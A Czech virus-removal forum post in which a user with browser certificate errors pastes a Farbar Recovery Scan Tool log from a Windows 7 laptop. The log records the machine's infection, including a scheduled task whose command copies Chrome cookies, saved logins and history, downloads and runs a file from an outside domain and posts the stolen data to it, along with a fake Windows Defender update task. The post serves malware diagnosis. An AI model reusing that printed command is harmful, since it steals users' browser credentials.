Odvirování PC, zrychlení počítače, vzdálená pomoc prostřednictvím služby neslape.cz

neplatné certifikaty v prohližečích

Máte problém s virem? Vložte sem log z FRST nebo RSIT.

Moderátor: Moderátoři

Pravidla fóra
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]

Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.

!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
Odpovědět
Zpráva
Autor
Eddydye
Návštěvník
Návštěvník
Příspěvky: 16
Registrován: 27 kvě 2021 16:55

neplatné certifikaty v prohližečích

#1 Příspěvek od Eddydye »

Prosím o kontrolu logu, hlásí to neplatné certifikáty v prohlížečích, někdy hodí že není připojení k internetu a když se prohlížeč vypne a zapne, naskočí tabulka že proces využívá jiná aplikace ale v procesech nic není.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-10-2021
Ran by PC (administrator) on PC-PC (ASUSTeK Computer Inc. K50IJ) (26-10-2021 16:54:41)
Running from C:\Users\PC\Desktop
Loaded Profiles: PC
Platform: Microsoft Windows 7 Home Premium (X64) Language: Čeština (Česká republika)
Default browser: IE
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\wcourier.exe
() [File not signed] C:\Program Files\ATKGFNEX\GFNEXSrv.exe
() [File not signed] C:\ProgramData\SoundFlowPicker\SoundFlowPicker.exe
(AlcorMicro Co., Ltd.) [File not signed] C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe
(ASUS) [File not signed] C:\Program Files (x86)\ASUS\ATK Media\DMedia.exe
(ASUSTeK Computer Inc. -> ) C:\Program Files (x86)\ASUS\ATK Hotkey\Atouch64.exe
(ASUSTeK Computer Inc. -> ) C:\Program Files (x86)\ASUS\ControlDeck\ControlDeckStartUp.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ASUS CopyProtect\ASPG.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\AsLdrSrv.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\ATKOSD.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\HControl.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\HControlUser.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\KBFiltr.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\WDC.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATKOSD2\ATKOSD2.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\SmartLogon\sensorsrv.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\SmartLogon\smartlogon.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Windows\AsScrPro.exe
(ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Windows\System32\FBAgent.exe
(ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Windows\SysWOW64\Fast Boot\FastBootAgent.exe
(ASUSTeK Computer Inc. -> ATK) C:\Program Files\P4G\BatteryLife.exe
(ASUSTeK) [File not signed] C:\Windows\SysWOW64\ACEngSvr.exe
(ATK) [File not signed] C:\Program Files (x86)\ASUS\Splendid\ACMON.exe
(CyberLink -> CyberLink) C:\Program Files (x86)\CyberLink\Power2Go\CLMLSvc.exe
(ELAN Microelectronics Corporation -> ELAN Microelectronic Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Google LLC -> Google LLC) [File not signed] C:\Program Files\Google\Chrome\Application\chrome.exe <29>
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler64.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Rezhabeck) [File not signed] C:\Program Files (x86)\MachinerData\main.exe
(Rezhabeck) [File not signed] C:\Program Files (x86)\MachinerData\mp3RenamerPro.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\BM\TMBMSRV.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\SfCtlCom.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\TmProxy.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\UfSeAgnt.exe
(VIA) [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDECK.EXE

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [UfSeAgnt.exe] => C:\Program Files\Trend Micro\Internet Security\UfSeAgnt.exe [1022368 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [320000 2009-04-09] (AlcorMicro Co., Ltd.) [File not signed]
HKLM\...\Run: [ETDWare] => C:\Program Files\Elantech\ETDCtrl.exe [619392 2009-06-12] (ELAN Microelectronics Corporation -> ELAN Microelectronic Corp.)
HKLM-x32\...\Run: [UpdateLBPShortCut] => C:\Program Files (x86)\CyberLink\LabelPrint\MUITransfer\MUIStartMenu.exe [222504 2009-05-20] (CyberLink -> CyberLink Corp.)
HKLM-x32\...\Run: [UpdateP2GoShortCut] => C:\Program Files (x86)\CyberLink\Power2Go\MUITransfer\MUIStartMenu.exe [218408 2008-12-04] (CyberLink -> CyberLink Corp.)
HKLM-x32\...\Run: [HDAudDeck] => C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe [2244096 2009-07-13] (VIA) [File not signed]
HKLM-x32\...\Run: [HControlUser] => C:\Program Files (x86)\ASUS\ATK Hotkey\HControlUser.exe [105016 2009-06-19] (ASUSTeK Computer Inc. -> ASUS)
HKLM-x32\...\Run: [ATKOSD2] => C:\Program Files (x86)\ASUS\ATKOSD2\ATKOSD2.exe [8493624 2009-07-07] (ASUSTeK Computer Inc. -> ASUS)
HKLM-x32\...\Run: [ATKMEDIA] => C:\Program Files (x86)\ASUS\ATK Media\DMedia.exe [159744 2009-04-20] (ASUS) [File not signed]
HKLM-x32\...\Run: [Setwallpaper] => c:\programdata\SetWallpaper.cmd
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\...\Run: [Google Update] => C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\GoogleUpdateCore.exe [223816 2021-10-11] (Google LLC -> Google LLC)
HKLM\...\Windows x64\Print Processors\Canon MP250 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPD9W.DLL [28672 2010-04-24] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Canon BJ Language Monitor MP250 series: C:\Windows\system32\CNMLM9W.DLL [336896 2010-04-24] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\95.0.4638.54\Installer\chrmstp.exe [2021-10-25] (Google LLC -> Google LLC) [File not signed]
HKLM\Software\...\Authentication\Credential Providers: [{06FE45A8-6D92-44ba-A0F1-9A9BCDC8F5A7}] -> C:\Program Files (x86)\ASUS\SmartLogon\system\FaceCredentialProvider64.dll [2009-05-01] (ASUS) [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FancyStart daemon.lnk [2009-10-06]
ShortcutTarget: FancyStart daemon.lnk -> C:\Windows\Installer\{60D6618B-153F-4353-8185-908E676E5888}\_DCE9A4DB2A5F2786140FA3.exe () [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\tmchlang.lnk [2009-10-06]
ShortcutTarget: tmchlang.lnk -> C:\Program Files\Trend Micro\Internet Security\TmChLang.exe (Trend Micro, Inc. -> Trend Micro Inc.)
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {169201BA-EF95-4DBA-A040-93D29590C6AF} - System32\Tasks\ASUSControlDeck => C:\Program Files (x86)\ASUS\ControlDeck\ControlDeckStartUp.exe [17976 2009-07-23] (ASUSTeK Computer Inc. -> )
Task: {2C093763-EE42-49CF-8891-F189A4AB542C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {326F35B1-9030-43D1-BD0D-5DBD49CECAFF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
Task: {3BA45A0D-24F6-4688-84BE-D1EA203FDFE0} - System32\Tasks\WC3 => C:\Program Files (x86)\ASUS\Wireless Console 3\wcourier.exe [1593344 2009-07-24] () [File not signed]
Task: {4CDF81D0-F7E2-48C8-817A-A530B90DD8DF} - System32\Tasks\Microsoft Windows Defender Update => C:\Program Files (x86)\Rezhabeck\mp3RenamerPro\mp3RenamerPro.exe
Task: {6E64456A-0201-4D80-BB77-5184B428C4FA} - System32\Tasks\Check Volumes => C:\Windows\SYSTEM32\CMD.EXE /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Local State" "C:\Users\PC\AppData\Local\Temp\OEROW4YA69" > NUL && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" http://1oivviovidwopopin.info/f2/OSJPN1IXJW.exe -s -k -o "C:\Users\PC\AppData\Local\Temp\OSJPN1IXJW.exe" && cd C:\Users\PC\AppData\Local\Temp\ && "OSJPN1IXJW.exe" V04J2WGO4Hf2 DYY04N8UKN 1Q541DFWIX OEROW4YA69 & copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\History" "C:\Users\PC\AppData\Local\Temp\J1O2156BEB" > NUL && cd C:\Users\PC\AppData\Local\Temp\ && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" -X POST -H "Content-type: application/octet-stream" --data @J1O2156BEB http://1oivviovidwopopin.info/h -> /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppDa (the data entry has 678 more characters). <==== ATTENTION
Task: {74344F07-42C6-4622-9312-152A6B0AECFF} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {7A61CC45-675A-42D9-BC0A-D3691F5842ED} - System32\Tasks\ASUS SmartLogon Console Sensor => C:\Program Files (x86)\ASUS\SmartLogon\sensorsrv.exe [305720 2009-05-19] (ASUSTeK Computer Inc. -> ASUS)
Task: {9EA161CC-94DA-40D4-AD7B-00389FB1DC3C} - System32\Tasks\ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [684544 2009-07-23] (ATK) [File not signed]
Task: {C02341A7-0F42-4050-B91B-7BBE20935F36} - System32\Tasks\ASUS Live Update => C:\Program Files (x86)\ASUS\ASUS Live Update\ALU.exe [51768 2007-11-30] (ASUSTeK Computer Inc. -> )
Task: {CA21A731-91AF-4714-8E6F-CFE619DD08A0} - System32\Tasks\Games\UpdateCheck_S-1-5-21-1878501408-2484808434-785971923-1000 => {CA22F5B1-E06F-4A2B-94FC-21E87FE53781} C:\Windows\System32\gameux.dll [2746368 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Task: {E24D73D5-BC2A-4F11-90B0-83E312366154} - System32\Tasks\ASUS P4G => C:\Program Files\P4G\BatteryLife.exe [267832 2009-07-29] (ASUSTeK Computer Inc. -> ATK)
Task: {F53D1F2C-4DBF-4EB4-9E7F-45350BE21FBF} - System32\Tasks\ASPG => C:\Program Files (x86)\ASUS\ASUS CopyProtect\aspg.exe [163384 2009-06-29] (ASUSTeK Computer Inc. -> ASUS)
Task: {FF6375C1-1AC9-466C-80D7-F1443D3F6986} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 78.157.167.7 78.157.167.57
Tcpip\..\Interfaces\{6FBAB886-4307-4726-B9CB-F48F3A217E2B}: [DhcpNameServer] 78.157.167.7 78.157.167.57

FireFox:
========
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll [No File]
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.3 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll [2008-11-13] (Microsoft Corporation -> Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8051.1204 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2008-12-04] (Microsoft Corporation -> Microsoft Corporation)

Chrome:
=======
CHR Profile: C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default [2021-10-26]
CHR Notifications: Default -> hxxps//tadesco.org
CHR Extension: (Prezentace) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2021-01-03]
CHR Extension: (Dokumenty) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2021-01-03]
CHR Extension: (Disk Google) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2021-01-03]
CHR Extension: (YouTube) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2021-01-03]
CHR Extension: (Tabulky) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2021-01-03]
CHR Extension: (Dokumenty Google offline) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-10-25]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Extension: (Gmail) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2021-01-03]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ATKGFNEXSrv; C:\Program Files\ATKGFNEX\GFNEXSrv.exe [94208 2007-08-08] () [File not signed]
R2 FastBootAgent; C:\Windows\SysWOW64\Fast Boot\FastBootAgent.exe [306232 2009-07-24] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.)
S3 GoogleChromeElevationService; C:\Program Files\Google\Chrome\Application\95.0.4638.54\elevation_service.exe [1480024 2021-10-16] (Google LLC -> Google LLC) [File not signed]
R2 Main Service; C:\Program Files (x86)\MachinerData\mp3RenamerPro.exe [1683456 2021-07-05] (Rezhabeck) [File not signed]
R2 SfCtlCom; C:\Program Files\Trend Micro\Internet Security\SfCtlCom.exe [838528 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R2 SoundFlowPicker; C:\ProgramData\SoundFlowPicker\SoundFlowPicker.exe [1064960 2021-07-05] () [File not signed] <==== ATTENTION
R3 TMBMServer; C:\Program Files\Trend Micro\BM\TMBMSRV.exe [570632 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 TmProxy; C:\Program Files\Trend Micro\Internet Security\TmProxy.exe [917768 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Windows -> Microsoft Corporation)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ASMMAP64; C:\Program Files\ATKGFNEX\ASMMAP64.sys [14904 2007-07-24] (ASUSTeK Computer Inc. -> )
R3 athr; C:\Windows\System32\DRIVERS\athrx.sys [1394688 2009-06-20] (Microsoft Windows -> Atheros Communications, Inc.)
R3 ETD; C:\Windows\System32\DRIVERS\ETD.sys [112128 2009-06-12] (Microsoft Windows Hardware Compatibility Publisher -> ELAN Microelectronic Corp.)
R3 kbfiltr; C:\Windows\System32\DRIVERS\kbfiltr.sys [15416 2009-07-20] (ASUSTeK Computer Inc. -> )
R3 L1E; C:\Windows\System32\DRIVERS\L1E62x64.sys [55296 2009-06-09] (Microsoft Windows Hardware Compatibility Publisher -> Atheros Communications, Inc.)
R0 lullaby; C:\Windows\System32\DRIVERS\lullaby.sys [15928 2009-06-18] (ASUSTeK Computer Inc. -> Windows (R) Win 7 DDK provider)
R3 SNP2UVC; C:\Windows\System32\DRIVERS\snp2uvc.sys [1806400 2009-06-05] (SONIX TECHNOLOGY CO. , LTD -> )
R3 tmpreflt; C:\Windows\System32\DRIVERS\tmpreflt.sys [42000 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R1 tmtdi; C:\Windows\System32\DRIVERS\tmtdi.sys [107536 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 tmxpflt; C:\Windows\System32\DRIVERS\tmxpflt.sys [258064 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 vsapint; C:\Windows\System32\DRIVERS\vsapint.sys [1883152 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
U3 tmlwf; no ImagePath
U3 tmwfp; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-10-26 16:52 - 2021-10-26 16:54 - 000000423 _____ C:\Users\PC\Desktop\Addition.txt
2021-10-26 16:47 - 2021-10-26 16:56 - 000017006 _____ C:\Users\PC\Desktop\FRST.txt
2021-10-26 16:47 - 2021-10-26 16:55 - 000000000 ____D C:\FRST
2021-10-26 16:42 - 2021-10-26 16:42 - 002310656 _____ (Farbar) C:\Users\PC\Desktop\FRST64.exe
2021-10-25 16:56 - 2021-10-25 16:56 - 000002244 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-10-25 16:56 - 2021-10-25 16:56 - 000002203 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-10-25 16:55 - 2021-10-25 16:55 - 000003388 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2021-10-25 16:55 - 2021-10-25 16:55 - 000003260 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2021-10-11 16:33 - 2021-10-11 16:33 - 001341272 _____ (Google LLC) C:\Users\PC\Downloads\ChromeSetup.exe

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-10-26 16:57 - 2021-08-05 15:40 - 000000824 _____ C:\Windows\system32\Drivers\etc\tmvsthfud.bin
2021-10-26 16:57 - 2021-08-05 15:40 - 000000824 _____ C:\Windows\system32\Drivers\etc\tmvsthfss.bin
2021-10-26 16:57 - 2021-07-13 16:04 - 000000004 _____ C:\ProgramData\rc.dat
2021-10-26 16:51 - 2021-07-13 16:03 - 000000004 _____ C:\ProgramData\lock.dat
2021-10-26 16:48 - 2009-07-14 06:45 - 000010016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2021-10-26 16:48 - 2009-07-14 06:45 - 000010016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2021-10-26 16:43 - 2021-01-03 19:43 - 000000000 ____D C:\Program Files (x86)\Google
2021-10-26 16:42 - 2021-07-13 16:03 - 000000056 _____ C:\ProgramData\lir.bats
2021-10-26 16:42 - 2009-10-06 11:33 - 000003004 _____ C:\Windows\system32\Tasks\ASUS Live Update
2021-10-26 16:41 - 2009-07-14 07:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2021-10-26 16:38 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\system32\NDF
2021-10-25 17:06 - 2021-02-16 16:18 - 000002262 _____ C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-10-25 17:06 - 2021-02-16 16:18 - 000002203 _____ C:\Users\PC\Desktop\Google Chrome.lnk
2021-10-25 17:06 - 2009-10-06 11:35 - 000001145 _____ C:\Windows\system32\ServiceFilter.ini
2021-10-11 16:05 - 2021-02-16 16:16 - 000003558 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA
2021-10-11 16:05 - 2021-02-16 16:16 - 000003286 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core

==================== Files in the root of some directories ========

2021-07-13 16:03 - 2021-10-26 16:51 - 000000004 _____ () C:\ProgramData\lock.dat
2021-07-13 16:04 - 2021-10-26 16:57 - 000000004 _____ () C:\ProgramData\rc.dat
2021-07-13 16:03 - 2021-07-13 16:03 - 000000008 _____ () C:\ProgramData\ts.dat
2007-06-12 18:34 - 2007-06-12 18:34 - 000035822 _____ () C:\Program Files (x86)\Common Files\ASPG_icon.ico
2008-05-22 17:35 - 2008-05-22 17:35 - 000051962 _____ () C:\Program Files (x86)\Common Files\banner.jpg
2009-04-08 19:31 - 2009-04-08 19:31 - 000106496 _____ () C:\Program Files (x86)\Common Files\CPInstallAction.dll
2008-08-12 06:45 - 2008-08-12 06:45 - 000155648 _____ (ASUS) C:\Program Files (x86)\Common Files\MSIactionall.dll

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


LastRegBack: 2021-03-31 16:37
==================== End of FRST.txt ========================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-10-2021
Ran by PC (26-10-2021 16:58:02)
Running from C:\Users\PC\Desktop
Microsoft Windows 7 Home Premium (X64) (2021-01-03 17:28:21)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================


(If an entry is included in the fixlist, it will be removed.)

Administrator (S-1-5-21-1878501408-2484808434-785971923-500 - Administrator - Disabled)
Guest (S-1-5-21-1878501408-2484808434-785971923-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1878501408-2484808434-785971923-1002 - Limited - Enabled)
PC (S-1-5-21-1878501408-2484808434-785971923-1000 - Administrator - Enabled) => C:\Users\PC

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Trend Micro Internet Security (Enabled - Up to date) {48929DFC-7A52-A34F-8351-C4DBEDBD9C50}
AS: Trend Micro Internet Security (Enabled - Up to date) {F3F37C18-5C68-ACC1-B9E1-FFA9963AD6ED}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Activation Assistant for the 2007 Microsoft Office suites (HKLM-x32\...\Activation Assistant for the 2007 Microsoft Office suites) (Version: - Microsoft Corporation)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 10 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 10.0.32.18 - Adobe Systems Incorporated)
Adobe Flash Player 10 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 10.0.32.18 - Adobe Systems Incorporated)
Adobe Reader 9.1 MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.1.0 - Adobe Systems Incorporated)
Alcor Micro USB Card Reader (HKLM-x32\...\InstallShield_{5A22D889-FBDD-4AE8-86EC-089D45FC133E}) (Version: 1.2.17.25001 - Alcor Micro Corp.)
Asistent pro přihlášení ke službě Windows Live (HKLM-x32\...\{1E779810-ACCA-4483-BC76-12DFE055B452}) (Version: 5.000.817.1 - Microsoft Corporation)
ASUS AI Recovery (HKLM-x32\...\{06585B02-F20D-4AB2-9A64-86EF2AE0F8F0}) (Version: 1.0.6 - ASUS)
ASUS CopyProtect (HKLM-x32\...\{6B77A7F6-DD63-4F13-A6FF-83137A5AC354}) (Version: 1.0.0015 - ASUS)
ASUS FancyStart (HKLM-x32\...\{60D6618B-153F-4353-8185-908E676E5888}) (Version: 1.0.5 - ASUSTeK Computer Inc.)
ASUS LifeFrame3 (HKLM-x32\...\{1DBD1F12-ED93-49C0-A7CC-56CBDE488158}) (Version: 3.0.20 - ASUS)
ASUS Live Update (HKLM-x32\...\{E657B243-9AD4-4ECC-BE81-4CCF8D667FD0}) (Version: 2.5.9 - ASUS)
ASUS MultiFrame (HKLM-x32\...\{9D48531D-2135-49FC-BC29-ACCDA5396A76}) (Version: 1.0.0019 - ASUS)
ASUS Power4Gear Hybrid (HKLM\...\{1686C4D1-B1FD-42E8-B7A8-FB4C4DBA5BA8}) (Version: 1.1.19 - ASUS)
ASUS SmartLogon (HKLM-x32\...\{64452561-169F-4A36-A2FF-B5E118EC65F5}) (Version: 1.0.0007 - ASUS)
ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 1.02.0028 - ASUS)
ASUS Virtual Camera (HKLM-x32\...\{EC8BD21F-0CA0-4BBF-97D9-4A52B30041A1}) (Version: 1.0.17 - asus)
Asus_Camera_ScreenSaver (HKLM-x32\...\Asus_Camera_ScreenSaver) (Version: 2.0.0009 - ASUS)
Atheros Communications Inc.(R) AR8121/AR8113/AR8114 Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.16 - Atheros Communications Inc.)
ATK Generic Function Service (HKLM-x32\...\{D3D54F3E-C5C3-443D-978F-87A72E5616E8}) (Version: 1.00.0008 - ATK)
ATK Hotkey (HKLM-x32\...\{7C05592D-424B-46CB-B505-E0013E8E75C9}) (Version: 1.0.0051 - ASUS)
ATK Media (HKLM-x32\...\{D1E5870E-E3E5-4475-98A6-ADD614524ADF}) (Version: 2.0.0005 - ASUS)
ATKOSD2 (HKLM-x32\...\{3B05F2FB-745B-4012-ADF2-439F36B2E70B}) (Version: 7.0.0005 - ASUS)
Canon MP250 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MP250_series) (Version: - Canon Inc.)
ControlDeck (HKLM-x32\...\{5B65EF64-1DFA-414A-8C94-7BB726158E21}) (Version: 1.0.3 - ASUS)
CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1720 - CyberLink Corp.)
CyberLink Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.2713 - CyberLink Corp.)
ETDWare PS/2-x64 7.0.5.5_WHQL (HKLM\...\Elantech) (Version: - )
Fast Boot (HKLM\...\{13F4A7F3-EABC-4261-AF6B-1317777F0755}) (Version: 1.0.3 - ASUS)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 95.0.4638.54 - Google LLC)
